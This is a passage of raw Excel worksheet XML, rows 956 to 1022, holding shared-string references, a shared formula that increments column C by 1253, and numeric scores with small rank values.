        <v>1845</v>
      </c>
      <c r="E956">
        <v>2.0658175945281978</v>
      </c>
      <c r="F956">
        <v>2</v>
      </c>
    </row>
    <row r="957" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A957" t="s">
        <v>1846</v>
      </c>
      <c r="B957" t="s">
        <v>1847</v>
      </c>
      <c r="C957">
        <f t="shared" si="14"/>
        <v>10628056</v>
      </c>
      <c r="D957" t="s">
        <v>1848</v>
      </c>
      <c r="E957">
        <v>21.09708404541016</v>
      </c>
      <c r="F957">
        <v>1</v>
      </c>
    </row>
    <row r="958" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A958" t="s">
        <v>1846</v>
      </c>
      <c r="B958" t="s">
        <v>1847</v>
      </c>
      <c r="C958">
        <f t="shared" si="14"/>
        <v>10629309</v>
      </c>
      <c r="D958" t="s">
        <v>1849</v>
      </c>
      <c r="E958">
        <v>16.671159744262699</v>
      </c>
      <c r="F958">
        <v>2</v>
      </c>
    </row>
    <row r="959" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A959" t="s">
        <v>1850</v>
      </c>
      <c r="B959" t="s">
        <v>1851</v>
      </c>
      <c r="C959">
        <f t="shared" si="14"/>
        <v>10630562</v>
      </c>
      <c r="D959" t="s">
        <v>1232</v>
      </c>
      <c r="E959">
        <v>26.143320083618161</v>
      </c>
      <c r="F959">
        <v>1</v>
      </c>
    </row>
    <row r="960" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A960" t="s">
        <v>1850</v>
      </c>
      <c r="B960" t="s">
        <v>1851</v>
      </c>
      <c r="C960">
        <f t="shared" si="14"/>
        <v>10631815</v>
      </c>
      <c r="D960" t="s">
        <v>1852</v>
      </c>
      <c r="E960">
        <v>16.471401214599609</v>
      </c>
      <c r="F960">
        <v>2</v>
      </c>
    </row>
    <row r="961" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A961" t="s">
        <v>1853</v>
      </c>
      <c r="B961" t="s">
        <v>1854</v>
      </c>
      <c r="C961">
        <f t="shared" si="14"/>
        <v>10633068</v>
      </c>
      <c r="D961" t="s">
        <v>1855</v>
      </c>
      <c r="E961">
        <v>15.326212882995611</v>
      </c>
      <c r="F961">
        <v>1</v>
      </c>
    </row>
    <row r="962" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A962" t="s">
        <v>1853</v>
      </c>
      <c r="B962" t="s">
        <v>1854</v>
      </c>
      <c r="C962">
        <f t="shared" si="14"/>
        <v>10634321</v>
      </c>
      <c r="D962" t="s">
        <v>1856</v>
      </c>
      <c r="E962">
        <v>10.906179428100589</v>
      </c>
      <c r="F962">
        <v>2</v>
      </c>
    </row>
    <row r="963" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A963" t="s">
        <v>1857</v>
      </c>
      <c r="B963" t="s">
        <v>1858</v>
      </c>
      <c r="C963">
        <f t="shared" si="14"/>
        <v>10635574</v>
      </c>
      <c r="D963" t="s">
        <v>1417</v>
      </c>
      <c r="E963">
        <v>25.791364669799801</v>
      </c>
      <c r="F963">
        <v>1</v>
      </c>
    </row>
    <row r="964" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A964" t="s">
        <v>1857</v>
      </c>
      <c r="B964" t="s">
        <v>1858</v>
      </c>
      <c r="C964">
        <f t="shared" si="14"/>
        <v>10636827</v>
      </c>
      <c r="D964" t="s">
        <v>1859</v>
      </c>
      <c r="E964">
        <v>5.3514218330383301</v>
      </c>
      <c r="F964">
        <v>2</v>
      </c>
    </row>
    <row r="965" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A965" t="s">
        <v>1860</v>
      </c>
      <c r="B965" t="s">
        <v>1861</v>
      </c>
      <c r="C965">
        <f t="shared" si="14"/>
        <v>10638080</v>
      </c>
      <c r="D965" t="s">
        <v>1862</v>
      </c>
      <c r="E965">
        <v>32.002841949462891</v>
      </c>
      <c r="F965">
        <v>1</v>
      </c>
    </row>
    <row r="966" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A966" t="s">
        <v>1860</v>
      </c>
      <c r="B966" t="s">
        <v>1861</v>
      </c>
      <c r="C966">
        <f t="shared" si="14"/>
        <v>10639333</v>
      </c>
      <c r="D966" t="s">
        <v>1863</v>
      </c>
      <c r="E966">
        <v>8.7250461578369141</v>
      </c>
      <c r="F966">
        <v>2</v>
      </c>
    </row>
    <row r="967" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A967" t="s">
        <v>1864</v>
      </c>
      <c r="B967" t="s">
        <v>1865</v>
      </c>
      <c r="C967">
        <f t="shared" si="14"/>
        <v>10640586</v>
      </c>
      <c r="D967" t="s">
        <v>1410</v>
      </c>
      <c r="E967">
        <v>33.861518859863281</v>
      </c>
      <c r="F967">
        <v>1</v>
      </c>
    </row>
    <row r="968" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A968" t="s">
        <v>1864</v>
      </c>
      <c r="B968" t="s">
        <v>1865</v>
      </c>
      <c r="C968">
        <f t="shared" si="14"/>
        <v>10641839</v>
      </c>
      <c r="D968" t="s">
        <v>1866</v>
      </c>
      <c r="E968">
        <v>9.6847288659773767E-5</v>
      </c>
      <c r="F968">
        <v>2</v>
      </c>
    </row>
    <row r="969" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A969" t="s">
        <v>1867</v>
      </c>
      <c r="B969" t="s">
        <v>1868</v>
      </c>
      <c r="C969">
        <f t="shared" si="14"/>
        <v>10643092</v>
      </c>
      <c r="D969" t="s">
        <v>1869</v>
      </c>
      <c r="E969">
        <v>27.897584915161129</v>
      </c>
      <c r="F969">
        <v>1</v>
      </c>
    </row>
    <row r="970" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A970" t="s">
        <v>1867</v>
      </c>
      <c r="B970" t="s">
        <v>1868</v>
      </c>
      <c r="C970">
        <f t="shared" ref="C970:C1033" si="15">C969+1253</f>
        <v>10644345</v>
      </c>
      <c r="D970" t="s">
        <v>1870</v>
      </c>
      <c r="E970">
        <v>13.051608085632321</v>
      </c>
      <c r="F970">
        <v>2</v>
      </c>
    </row>
    <row r="971" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A971" t="s">
        <v>1871</v>
      </c>
      <c r="B971" t="s">
        <v>1872</v>
      </c>
      <c r="C971">
        <f t="shared" si="15"/>
        <v>10645598</v>
      </c>
      <c r="D971" t="s">
        <v>1873</v>
      </c>
      <c r="E971">
        <v>27.833436965942379</v>
      </c>
      <c r="F971">
        <v>1</v>
      </c>
    </row>
    <row r="972" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A972" t="s">
        <v>1871</v>
      </c>
      <c r="B972" t="s">
        <v>1872</v>
      </c>
      <c r="C972">
        <f t="shared" si="15"/>
        <v>10646851</v>
      </c>
      <c r="D972" t="s">
        <v>1874</v>
      </c>
      <c r="E972">
        <v>16.133188247680661</v>
      </c>
      <c r="F972">
        <v>2</v>
      </c>
    </row>
    <row r="973" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A973" t="s">
        <v>1875</v>
      </c>
      <c r="B973" t="s">
        <v>1876</v>
      </c>
      <c r="C973">
        <f t="shared" si="15"/>
        <v>10648104</v>
      </c>
      <c r="D973" t="s">
        <v>1877</v>
      </c>
      <c r="E973">
        <v>24.281198501586911</v>
      </c>
      <c r="F973">
        <v>1</v>
      </c>
    </row>
    <row r="974" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A974" t="s">
        <v>1875</v>
      </c>
      <c r="B974" t="s">
        <v>1876</v>
      </c>
      <c r="C974">
        <f t="shared" si="15"/>
        <v>10649357</v>
      </c>
      <c r="D974" t="s">
        <v>1878</v>
      </c>
      <c r="E974">
        <v>2.6277298927307129</v>
      </c>
      <c r="F974">
        <v>2</v>
      </c>
    </row>
    <row r="975" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A975" t="s">
        <v>1879</v>
      </c>
      <c r="B975" t="s">
        <v>1880</v>
      </c>
      <c r="C975">
        <f t="shared" si="15"/>
        <v>10650610</v>
      </c>
      <c r="D975" t="s">
        <v>1398</v>
      </c>
      <c r="E975">
        <v>24.88973426818848</v>
      </c>
      <c r="F975">
        <v>1</v>
      </c>
    </row>
    <row r="976" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A976" t="s">
        <v>1879</v>
      </c>
      <c r="B976" t="s">
        <v>1880</v>
      </c>
      <c r="C976">
        <f t="shared" si="15"/>
        <v>10651863</v>
      </c>
      <c r="D976" t="s">
        <v>1881</v>
      </c>
      <c r="E976">
        <v>1.18242871761322</v>
      </c>
      <c r="F976">
        <v>2</v>
      </c>
    </row>
    <row r="977" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A977" t="s">
        <v>1882</v>
      </c>
      <c r="B977" t="s">
        <v>1883</v>
      </c>
      <c r="C977">
        <f t="shared" si="15"/>
        <v>10653116</v>
      </c>
      <c r="D977" t="s">
        <v>1382</v>
      </c>
      <c r="E977">
        <v>19.61845588684082</v>
      </c>
      <c r="F977">
        <v>1</v>
      </c>
    </row>
    <row r="978" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A978" t="s">
        <v>1882</v>
      </c>
      <c r="B978" t="s">
        <v>1883</v>
      </c>
      <c r="C978">
        <f t="shared" si="15"/>
        <v>10654369</v>
      </c>
      <c r="D978" t="s">
        <v>1884</v>
      </c>
      <c r="E978">
        <v>14.55227565765381</v>
      </c>
      <c r="F978">
        <v>2</v>
      </c>
    </row>
    <row r="979" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A979" t="s">
        <v>1885</v>
      </c>
      <c r="B979" t="s">
        <v>1886</v>
      </c>
      <c r="C979">
        <f t="shared" si="15"/>
        <v>10655622</v>
      </c>
      <c r="D979" t="s">
        <v>1406</v>
      </c>
      <c r="E979">
        <v>33.370826721191413</v>
      </c>
      <c r="F979">
        <v>1</v>
      </c>
    </row>
    <row r="980" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A980" t="s">
        <v>1885</v>
      </c>
      <c r="B980" t="s">
        <v>1886</v>
      </c>
      <c r="C980">
        <f t="shared" si="15"/>
        <v>10656875</v>
      </c>
      <c r="D980" t="s">
        <v>1887</v>
      </c>
      <c r="E980">
        <v>13.57522773742676</v>
      </c>
      <c r="F980">
        <v>2</v>
      </c>
    </row>
    <row r="981" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A981" t="s">
        <v>1888</v>
      </c>
      <c r="B981" t="s">
        <v>1889</v>
      </c>
      <c r="C981">
        <f t="shared" si="15"/>
        <v>10658128</v>
      </c>
      <c r="D981" t="s">
        <v>1890</v>
      </c>
      <c r="E981">
        <v>30.148529052734379</v>
      </c>
      <c r="F981">
        <v>1</v>
      </c>
    </row>
    <row r="982" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A982" t="s">
        <v>1888</v>
      </c>
      <c r="B982" t="s">
        <v>1889</v>
      </c>
      <c r="C982">
        <f t="shared" si="15"/>
        <v>10659381</v>
      </c>
      <c r="D982" t="s">
        <v>1891</v>
      </c>
      <c r="E982">
        <v>2.844312228262424E-3</v>
      </c>
      <c r="F982">
        <v>2</v>
      </c>
    </row>
    <row r="983" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A983" t="s">
        <v>1892</v>
      </c>
      <c r="B983" t="s">
        <v>1893</v>
      </c>
      <c r="C983">
        <f t="shared" si="15"/>
        <v>10660634</v>
      </c>
      <c r="D983" t="s">
        <v>1894</v>
      </c>
      <c r="E983">
        <v>24.609733581542969</v>
      </c>
      <c r="F983">
        <v>1</v>
      </c>
    </row>
    <row r="984" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A984" t="s">
        <v>1892</v>
      </c>
      <c r="B984" t="s">
        <v>1893</v>
      </c>
      <c r="C984">
        <f t="shared" si="15"/>
        <v>10661887</v>
      </c>
      <c r="D984" t="s">
        <v>1895</v>
      </c>
      <c r="E984">
        <v>6.0229587554931641</v>
      </c>
      <c r="F984">
        <v>2</v>
      </c>
    </row>
    <row r="985" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A985" t="s">
        <v>1896</v>
      </c>
      <c r="B985" t="s">
        <v>1897</v>
      </c>
      <c r="C985">
        <f t="shared" si="15"/>
        <v>10663140</v>
      </c>
      <c r="D985" t="s">
        <v>1898</v>
      </c>
      <c r="E985">
        <v>28.95185661315918</v>
      </c>
      <c r="F985">
        <v>1</v>
      </c>
    </row>
    <row r="986" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A986" t="s">
        <v>1896</v>
      </c>
      <c r="B986" t="s">
        <v>1897</v>
      </c>
      <c r="C986">
        <f t="shared" si="15"/>
        <v>10664393</v>
      </c>
      <c r="D986" t="s">
        <v>1899</v>
      </c>
      <c r="E986">
        <v>11.695785522460939</v>
      </c>
      <c r="F986">
        <v>2</v>
      </c>
    </row>
    <row r="987" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A987" t="s">
        <v>1900</v>
      </c>
      <c r="B987" t="s">
        <v>1901</v>
      </c>
      <c r="C987">
        <f t="shared" si="15"/>
        <v>10665646</v>
      </c>
      <c r="D987" t="s">
        <v>1902</v>
      </c>
      <c r="E987">
        <v>23.654958724975589</v>
      </c>
      <c r="F987">
        <v>1</v>
      </c>
    </row>
    <row r="988" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A988" t="s">
        <v>1900</v>
      </c>
      <c r="B988" t="s">
        <v>1901</v>
      </c>
      <c r="C988">
        <f t="shared" si="15"/>
        <v>10666899</v>
      </c>
      <c r="D988" t="s">
        <v>1903</v>
      </c>
      <c r="E988">
        <v>0.85875850915908813</v>
      </c>
      <c r="F988">
        <v>2</v>
      </c>
    </row>
    <row r="989" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A989" t="s">
        <v>1904</v>
      </c>
      <c r="B989" t="s">
        <v>1905</v>
      </c>
      <c r="C989">
        <f t="shared" si="15"/>
        <v>10668152</v>
      </c>
      <c r="D989" t="s">
        <v>1277</v>
      </c>
      <c r="E989">
        <v>29.143072128295898</v>
      </c>
      <c r="F989">
        <v>1</v>
      </c>
    </row>
    <row r="990" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A990" t="s">
        <v>1904</v>
      </c>
      <c r="B990" t="s">
        <v>1905</v>
      </c>
      <c r="C990">
        <f t="shared" si="15"/>
        <v>10669405</v>
      </c>
      <c r="D990" t="s">
        <v>1906</v>
      </c>
      <c r="E990">
        <v>3.9962866306304932</v>
      </c>
      <c r="F990">
        <v>2</v>
      </c>
    </row>
    <row r="991" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A991" t="s">
        <v>1907</v>
      </c>
      <c r="B991" t="s">
        <v>1908</v>
      </c>
      <c r="C991">
        <f t="shared" si="15"/>
        <v>10670658</v>
      </c>
      <c r="D991" t="s">
        <v>1236</v>
      </c>
      <c r="E991">
        <v>37.726402282714837</v>
      </c>
      <c r="F991">
        <v>1</v>
      </c>
    </row>
    <row r="992" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A992" t="s">
        <v>1907</v>
      </c>
      <c r="B992" t="s">
        <v>1908</v>
      </c>
      <c r="C992">
        <f t="shared" si="15"/>
        <v>10671911</v>
      </c>
      <c r="D992" t="s">
        <v>1909</v>
      </c>
      <c r="E992">
        <v>1.295587792992592E-2</v>
      </c>
      <c r="F992">
        <v>2</v>
      </c>
    </row>
    <row r="993" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A993" t="s">
        <v>1910</v>
      </c>
      <c r="B993" t="s">
        <v>1911</v>
      </c>
      <c r="C993">
        <f t="shared" si="15"/>
        <v>10673164</v>
      </c>
      <c r="D993" t="s">
        <v>920</v>
      </c>
      <c r="E993">
        <v>26.74197959899902</v>
      </c>
      <c r="F993">
        <v>1</v>
      </c>
    </row>
    <row r="994" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A994" t="s">
        <v>1910</v>
      </c>
      <c r="B994" t="s">
        <v>1911</v>
      </c>
      <c r="C994">
        <f t="shared" si="15"/>
        <v>10674417</v>
      </c>
      <c r="D994" t="s">
        <v>1912</v>
      </c>
      <c r="E994">
        <v>1.64609694480896</v>
      </c>
      <c r="F994">
        <v>2</v>
      </c>
    </row>
    <row r="995" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A995" t="s">
        <v>1913</v>
      </c>
      <c r="B995" t="s">
        <v>1914</v>
      </c>
      <c r="C995">
        <f t="shared" si="15"/>
        <v>10675670</v>
      </c>
      <c r="D995" t="s">
        <v>1915</v>
      </c>
      <c r="E995">
        <v>29.3119010925293</v>
      </c>
      <c r="F995">
        <v>1</v>
      </c>
    </row>
    <row r="996" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A996" t="s">
        <v>1913</v>
      </c>
      <c r="B996" t="s">
        <v>1914</v>
      </c>
      <c r="C996">
        <f t="shared" si="15"/>
        <v>10676923</v>
      </c>
      <c r="D996" t="s">
        <v>1916</v>
      </c>
      <c r="E996">
        <v>6.1129745095968253E-2</v>
      </c>
      <c r="F996">
        <v>2</v>
      </c>
    </row>
    <row r="997" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A997" t="s">
        <v>1917</v>
      </c>
      <c r="B997" t="s">
        <v>1918</v>
      </c>
      <c r="C997">
        <f t="shared" si="15"/>
        <v>10678176</v>
      </c>
      <c r="D997" t="s">
        <v>1919</v>
      </c>
      <c r="E997">
        <v>17.045791625976559</v>
      </c>
      <c r="F997">
        <v>1</v>
      </c>
    </row>
    <row r="998" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A998" t="s">
        <v>1917</v>
      </c>
      <c r="B998" t="s">
        <v>1918</v>
      </c>
      <c r="C998">
        <f t="shared" si="15"/>
        <v>10679429</v>
      </c>
      <c r="D998" t="s">
        <v>1920</v>
      </c>
      <c r="E998">
        <v>10.64848709106445</v>
      </c>
      <c r="F998">
        <v>2</v>
      </c>
    </row>
    <row r="999" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A999" t="s">
        <v>1921</v>
      </c>
      <c r="B999" t="s">
        <v>1922</v>
      </c>
      <c r="C999">
        <f t="shared" si="15"/>
        <v>10680682</v>
      </c>
      <c r="D999" t="s">
        <v>1923</v>
      </c>
      <c r="E999">
        <v>29.75074577331543</v>
      </c>
      <c r="F999">
        <v>1</v>
      </c>
    </row>
    <row r="1000" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1000" t="s">
        <v>1921</v>
      </c>
      <c r="B1000" t="s">
        <v>1922</v>
      </c>
      <c r="C1000">
        <f t="shared" si="15"/>
        <v>10681935</v>
      </c>
      <c r="D1000" t="s">
        <v>1924</v>
      </c>
      <c r="E1000">
        <v>4.585515022277832</v>
      </c>
      <c r="F1000">
        <v>2</v>
      </c>
    </row>
    <row r="1001" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1001" t="s">
        <v>1925</v>
      </c>
      <c r="B1001" t="s">
        <v>1926</v>
      </c>
      <c r="C1001">
        <f t="shared" si="15"/>
        <v>10683188</v>
      </c>
      <c r="D1001" t="s">
        <v>1498</v>
      </c>
      <c r="E1001">
        <v>27.655239105224609</v>
      </c>
      <c r="F1001">
        <v>1</v>
      </c>
    </row>
    <row r="1002" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1002" t="s">
        <v>1925</v>
      </c>
      <c r="B1002" t="s">
        <v>1926</v>
      </c>
      <c r="C1002">
        <f t="shared" si="15"/>
        <v>10684441</v>
      </c>
      <c r="D1002" t="s">
        <v>1927</v>
      </c>
      <c r="E1002">
        <v>5.2167387008666992</v>
      </c>
      <c r="F1002">
        <v>2</v>
      </c>
    </row>
    <row r="1003" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1003" t="s">
        <v>1928</v>
      </c>
      <c r="B1003" t="s">
        <v>1929</v>
      </c>
      <c r="C1003">
        <f t="shared" si="15"/>
        <v>10685694</v>
      </c>
      <c r="D1003" t="s">
        <v>1930</v>
      </c>
      <c r="E1003">
        <v>26.148004531860352</v>
      </c>
      <c r="F1003">
        <v>1</v>
      </c>
    </row>
    <row r="1004" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1004" t="s">
        <v>1928</v>
      </c>
      <c r="B1004" t="s">
        <v>1929</v>
      </c>
      <c r="C1004">
        <f t="shared" si="15"/>
        <v>10686947</v>
      </c>
      <c r="D1004" t="s">
        <v>1931</v>
      </c>
      <c r="E1004">
        <v>7.1300177574157706</v>
      </c>
      <c r="F1004">
        <v>2</v>
      </c>
    </row>
    <row r="1005" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1005" t="s">
        <v>1932</v>
      </c>
      <c r="B1005" t="s">
        <v>1933</v>
      </c>
      <c r="C1005">
        <f t="shared" si="15"/>
        <v>10688200</v>
      </c>
      <c r="D1005" t="s">
        <v>1934</v>
      </c>
      <c r="E1005">
        <v>27.354228973388668</v>
      </c>
      <c r="F1005">
        <v>1</v>
      </c>
    </row>
    <row r="1006" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1006" t="s">
        <v>1932</v>
      </c>
      <c r="B1006" t="s">
        <v>1933</v>
      </c>
      <c r="C1006">
        <f t="shared" si="15"/>
        <v>10689453</v>
      </c>
      <c r="D1006" t="s">
        <v>1935</v>
      </c>
      <c r="E1006">
        <v>9.4173564910888672</v>
      </c>
      <c r="F1006">
        <v>2</v>
      </c>
    </row>
    <row r="1007" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1007" t="s">
        <v>1936</v>
      </c>
      <c r="B1007" t="s">
        <v>1937</v>
      </c>
      <c r="C1007">
        <f t="shared" si="15"/>
        <v>10690706</v>
      </c>
      <c r="D1007" t="s">
        <v>1938</v>
      </c>
      <c r="E1007">
        <v>28.307479858398441</v>
      </c>
      <c r="F1007">
        <v>1</v>
      </c>
    </row>
    <row r="1008" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1008" t="s">
        <v>1936</v>
      </c>
      <c r="B1008" t="s">
        <v>1937</v>
      </c>
      <c r="C1008">
        <f t="shared" si="15"/>
        <v>10691959</v>
      </c>
      <c r="D1008" t="s">
        <v>1939</v>
      </c>
      <c r="E1008">
        <v>4.321627140045166</v>
      </c>
      <c r="F1008">
        <v>2</v>
      </c>
    </row>
    <row r="1009" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1009" t="s">
        <v>1940</v>
      </c>
      <c r="B1009" t="s">
        <v>1941</v>
      </c>
      <c r="C1009">
        <f t="shared" si="15"/>
        <v>10693212</v>
      </c>
      <c r="D1009" t="s">
        <v>1942</v>
      </c>
      <c r="E1009">
        <v>34.100631713867188</v>
      </c>
      <c r="F1009">
        <v>1</v>
      </c>
    </row>
    <row r="1010" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1010" t="s">
        <v>1940</v>
      </c>
      <c r="B1010" t="s">
        <v>1943</v>
      </c>
      <c r="C1010">
        <f t="shared" si="15"/>
        <v>10694465</v>
      </c>
      <c r="D1010" t="s">
        <v>1944</v>
      </c>
      <c r="E1010">
        <v>26.3834114074707</v>
      </c>
      <c r="F1010">
        <v>2</v>
      </c>
    </row>
    <row r="1011" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1011" t="s">
        <v>1940</v>
      </c>
      <c r="B1011" t="s">
        <v>1943</v>
      </c>
      <c r="C1011">
        <f t="shared" si="15"/>
        <v>10695718</v>
      </c>
      <c r="D1011" t="s">
        <v>1945</v>
      </c>
      <c r="E1011">
        <v>15.2786979675293</v>
      </c>
      <c r="F1011">
        <v>3</v>
      </c>
    </row>
    <row r="1012" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1012" t="s">
        <v>1946</v>
      </c>
      <c r="B1012" t="s">
        <v>1947</v>
      </c>
      <c r="C1012">
        <f t="shared" si="15"/>
        <v>10696971</v>
      </c>
      <c r="D1012" t="s">
        <v>1948</v>
      </c>
      <c r="E1012">
        <v>28.39487266540527</v>
      </c>
      <c r="F1012">
        <v>1</v>
      </c>
    </row>
    <row r="1013" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1013" t="s">
        <v>1946</v>
      </c>
      <c r="B1013" t="s">
        <v>1947</v>
      </c>
      <c r="C1013">
        <f t="shared" si="15"/>
        <v>10698224</v>
      </c>
      <c r="D1013" t="s">
        <v>1949</v>
      </c>
      <c r="E1013">
        <v>7.226475715637207</v>
      </c>
      <c r="F1013">
        <v>2</v>
      </c>
    </row>
    <row r="1014" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1014" t="s">
        <v>1950</v>
      </c>
      <c r="B1014" t="s">
        <v>1951</v>
      </c>
      <c r="C1014">
        <f t="shared" si="15"/>
        <v>10699477</v>
      </c>
      <c r="D1014" t="s">
        <v>1952</v>
      </c>
      <c r="E1014">
        <v>41.153865814208977</v>
      </c>
      <c r="F1014">
        <v>1</v>
      </c>
    </row>
    <row r="1015" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1015" t="s">
        <v>1950</v>
      </c>
      <c r="B1015" t="s">
        <v>1951</v>
      </c>
      <c r="C1015">
        <f t="shared" si="15"/>
        <v>10700730</v>
      </c>
      <c r="D1015" t="s">
        <v>1953</v>
      </c>
      <c r="E1015">
        <v>7.5537209510803223</v>
      </c>
      <c r="F1015">
        <v>2</v>
      </c>
    </row>
    <row r="1016" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1016" t="s">
        <v>1954</v>
      </c>
      <c r="B1016" t="s">
        <v>1955</v>
      </c>
      <c r="C1016">
        <f t="shared" si="15"/>
        <v>10701983</v>
      </c>
      <c r="D1016" t="s">
        <v>1956</v>
      </c>
      <c r="E1016">
        <v>29.77935791015625</v>
      </c>
      <c r="F1016">
        <v>1</v>
      </c>
    </row>
    <row r="1017" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1017" t="s">
        <v>1954</v>
      </c>
      <c r="B1017" t="s">
        <v>1955</v>
      </c>
      <c r="C1017">
        <f t="shared" si="15"/>
        <v>10703236</v>
      </c>
      <c r="D1017" t="s">
        <v>1957</v>
      </c>
      <c r="E1017">
        <v>6.3717474937438956</v>
      </c>
      <c r="F1017">
        <v>2</v>
      </c>
    </row>
    <row r="1018" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1018" t="s">
        <v>1958</v>
      </c>
      <c r="B1018" t="s">
        <v>1959</v>
      </c>
      <c r="C1018">
        <f t="shared" si="15"/>
        <v>10704489</v>
      </c>
      <c r="D1018" t="s">
        <v>1960</v>
      </c>
      <c r="E1018">
        <v>30.86269378662109</v>
      </c>
      <c r="F1018">
        <v>1</v>
      </c>
    </row>
    <row r="1019" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1019" t="s">
        <v>1958</v>
      </c>
      <c r="B1019" t="s">
        <v>1959</v>
      </c>
      <c r="C1019">
        <f t="shared" si="15"/>
        <v>10705742</v>
      </c>
      <c r="D1019" t="s">
        <v>1961</v>
      </c>
      <c r="E1019">
        <v>1.122519850730896</v>
      </c>
      <c r="F1019">
        <v>2</v>
      </c>
    </row>
    <row r="1020" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1020" t="s">
        <v>1962</v>
      </c>
      <c r="B1020" t="s">
        <v>1963</v>
      </c>
      <c r="C1020">
        <f t="shared" si="15"/>
        <v>10706995</v>
      </c>
      <c r="D1020" t="s">
        <v>1964</v>
      </c>
      <c r="E1020">
        <v>21.612455368041989</v>
      </c>
      <c r="F1020">
        <v>1</v>
      </c>
    </row>
    <row r="1021" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1021" t="s">
        <v>1962</v>
      </c>
      <c r="B1021" t="s">
        <v>1963</v>
      </c>
      <c r="C1021">
        <f t="shared" si="15"/>
        <v>10708248</v>
      </c>
      <c r="D1021" t="s">
        <v>1965</v>
      </c>
      <c r="E1021">
        <v>4.583005428314209</v>
      </c>
      <c r="F1021">
        <v>2</v>
      </c>
    </row>
    <row r="1022" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1022" t="s">
        <v>1966</v>
      </c>
      <c r="B1022" t="s">
        <v>1967</v>
      </c>
      <c r="C1022">
        <f t="shared" si="15"/>
        <v>10709501</v>
      </c>
      <c r="D1022" t="s">
        <v>1968</v>
      </c>
      <c r="E1022">
        <v>20.894321441650391</v>
      </c>
      <c r="F1022">
        <v>1</v>
      </c>
    </row>
